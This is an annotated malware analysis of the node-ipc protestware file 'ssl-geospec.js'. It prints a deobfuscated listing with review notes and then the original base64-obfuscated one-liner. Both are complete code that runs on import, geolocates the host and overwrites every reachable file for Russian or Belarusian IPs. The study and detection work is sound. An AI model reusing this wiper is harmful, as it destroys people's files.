A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.
A deleted commit from the node-ipc repository. You can find the original commit here: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js
WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR OWN RISK.
import path from "path"; | |
import fs from "fs"; | |
import https from "https"; | |
// **WARNING: THIS IS LIVE MALWARE. RUN IT AT YOUR RISK.** | |
// Obfuscated code that I deobfuscated. | |
// I also added comments which should help explain what exactly is going on here. | |
// I renamed some variables here to have more meaningful names, and also left a bunch of edits here and there. | |
// I may have messed something up (I wrote it on a phone at 5am), so if I did, feel free to yell at me in the comments. -Seq | |
// Originally written by Brandon Nozaki Miller (https://github.com/RIAEvangelist) | |
// See you in prison, Brandon. | |
// Deobfuscation by BrandonMiller97528 (nice name), further edits by Seq (https://github.com/lithiumjs) | |
// Original commit: https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js | |
// A timeout is used to add an artificial delay. | |
// The timer is set to a random number of milliseconds between 0 and 1000 (1 second). -Seq | |
// NOTE(review): this call sits at module top level, so the timer is armed as a side effect of
// importing the file; nothing exported has to be called for the code below to run.
setTimeout(function () { | |
// Random gate before anything else happens. | |
// The callback returns early when the rounded value is 2, 3 or 4, which is 62.5% of runs; the destructive path below is reached in the remaining 37.5%. -Seq (figure kept, meaning corrected) | |
// NOTE(review): because of this gate, one quiet sandbox run says nothing about whether the
// module is harmless.
if (Math.round(Math.random() * 4) > 1) return; | |
// This URL is used to specifically target people in Russia and Belarus. | |
// NOTE(review): the API key is hard-coded in the URL. An outbound HTTPS request to this host made
// while a dependency is being loaded is a usable network indicator for detection and egress filtering.
const uri = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154"; // nice key. -Seq | |
// A request is sent to the URL above. The server replies with the location it associates with the requester. | |
// NOTE(review): the parameter names below are misleading. `request` is the HTTP response stream
// and `response` is one "data" chunk of its body, which is parsed on its own.
https.get(uri, function (request) { | |
request.on("data", function (response) { | |
// Specifically targets the citizens of Russia and Belarus. | |
try { | |
const data = JSON.parse(response); | |
const countryName = data.country_name.toLowerCase(); | |
// "If your country is Russia or Belarus, overwrite all of your files." | |
// NOTE(review): the decision rests on IP geolocation alone, so VPN exits, proxies and cloud or
// CI hosts whose addresses geolocate to these countries match as well.
if (countryName.includes("russia") || countryName.includes("belarus")) { | |
// NOTE(review): relative paths are resolved against the process working directory, not this
// file's location. What each call can overwrite is bounded by the write permissions of the
// account running Node.
wipe("./"); // Wipe current folder | |
wipe("../"); // Wipe parent folder | |
wipe("../../"); // Wipe parent of a parent | |
wipe("/"); // Wipe root of the filesystem... Why include the previous 3 then? | |
} | |
} catch (t) {} // Ignore any errors (a failed parse or a missing country_name ends up here too) | |
}); | |
}); | |
}, Math.ceil(Math.random() * 1000)); | |
/** | |
* The function that does the overwriting. Not sure why it is `async` though. | |
* NOTE(review): there is no `await` in the body, so all of it runs synchronously inside the call;
* being `async` only means the caller receives a Promise instead of the array.
* @param fsPath Path to wipe the files in. | |
* @param nameToWipe If specified, only wipes files whose joined path contains this substring. With the default "" every file matches, and no caller in this file passes a value. | |
* @returns Supposedly a list of all deleted files, but actually just an empty array (wrapped in a Promise), or undefined when fsPath does not exist. Brandon's an idiot. | |
*/ | |
async function wipe(fsPath = "", nameToWipe = "") { | |
// Checks to see if the directory within your file system exists. | |
if (!fs.existsSync(fsPath)) return; | |
let files = []; | |
try { | |
// Gets all of the files within the directory. | |
// NOTE(review): a directory that cannot be listed leaves `files` empty and is skipped silently.
files = fs.readdirSync(fsPath); | |
} catch (t) {} | |
const wipedFiles = []; | |
// Your files will get overwritten with a heart emoji. Perfect. | |
// Iterate over all files within a directory. | |
for (var i = 0; i < files.length; i++) { | |
const filePath = path.join(fsPath, files[i]); | |
let stats = null; | |
try { | |
// NOTE(review): lstat describes the entry itself and does not follow symbolic links.
stats = fs.lstatSync(filePath); | |
} catch (t) { | |
continue; | |
} | |
// If the file is a directory, it will run the `wipe` function again. | |
if (stats.isDirectory()) { | |
const subWiped = wipe(filePath, nameToWipe); | |
// Again, the function was async, so `subWiped` is a Promise and Promises have no length property. | |
// NOTE(review): only the bookkeeping is broken. The recursive call above has already walked the subdirectory by the time it returns, so the whole reachable tree is affected; `undefined > 0` is false and nothing is ever pushed. | |
if (subWiped.length > 0) wipedFiles.push(...subWiped); | |
} else if (filePath.indexOf(nameToWipe) >= 0) { | |
try { | |
// The files get overwritten. Thanks, Brandon. | |
// NOTE(review): contents are replaced, not deleted. Names and directory layout survive while
// every touched file ends up holding the same short string, which is a usable triage signal;
// recovery needs backups. The write is asynchronous with an empty callback, so failures are
// dropped; the surrounding try/catch only sees synchronous throws.
fs.writeFile(filePath, "❤️", function () {}); | |
} catch (t) {} | |
} | |
} | |
return wipedFiles; | |
} | |
// Fake exports probably intended to trick consumers. | |
// NOTE(review): the exported constant carries no functionality. Everything this module does
// happens as an import side effect (the top-level setTimeout), so a review that looks only at
// the exported API misses it.
const ssl = true; | |
export { ssl, ssl as default }; |
// Apparently the original obfuscated form of the listing above, minified onto one line.
// NOTE(review): every telling string (the lookup URL, the four paths, the `country_name` key,
// both country names and the replacement content) is stored base64-encoded and decoded at run
// time with Buffer.from(..., "base64"), so a plain-text search of the package for the URL or the
// country names finds nothing. Dependency review and scanning have to decode such literals, and
// a module that combines `https`, `fs` write calls and base64 literals in import-time code
// deserves a manual look.
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl} |